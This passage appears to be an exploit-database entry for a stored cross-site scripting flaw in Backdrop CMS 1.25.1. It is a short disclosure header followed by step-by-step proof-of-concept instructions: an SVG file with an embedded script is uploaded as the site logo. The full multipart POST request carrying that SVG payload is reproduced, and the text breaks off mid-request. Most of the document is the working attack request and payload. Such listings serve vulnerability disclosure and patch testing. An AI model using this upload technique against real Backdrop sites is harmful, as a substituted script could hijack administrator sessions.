Share
## https://sploitus.com/exploit?id=PACKETSTORM:173638
#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)  
#Application: Backdrop Cms  
#Version: v1.25.1  
#Bugs: Stored Xss  
#Technology: PHP  
#Vendor URL: https://backdropcms.org/  
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip  
#Date of found: 12-07-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux   
  
2. Technical Details & POC  
========================================  
  
1. login to account  
2. go to http://localhost/backdrop/?q=admin/config/system/site-information  
3. upload svg file  
  
"""  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
<script type="text/javascript">  
alert(document.location);  
</script>  
</svg>  
"""  
4. go to svg file (http://localhost/backdrop/files/malas_2.svg)  
  
  
Request  
  
POST /backdrop/?q=admin/config/system/site-information HTTP/1.1  
Host: localhost  
Content-Length: 2116  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/backdrop/?q=admin/config/system/site-information  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E  
Connection: close  
  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_name"  
  
My Backdrop Site  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_slogan"  
  
  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_mail"  
  
admin@admin.com  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
<script type="text/javascript">  
alert(document.location);  
</script>  
</svg>  
  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_logo_path"  
  
  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_favicon_path"  
  
core/misc/favicon.ico  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_frontpage"  
  
home  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_403"  
  
  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="site_404"  
  
  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="form_build_id"  
  
form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="form_token"  
  
siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="form_id"  
  
system_site_information_settings  
------WebKitFormBoundaryVXWRsHHM3TVjALpg  
Content-Disposition: form-data; name="op"  
  
Save configuration  
------WebKitForm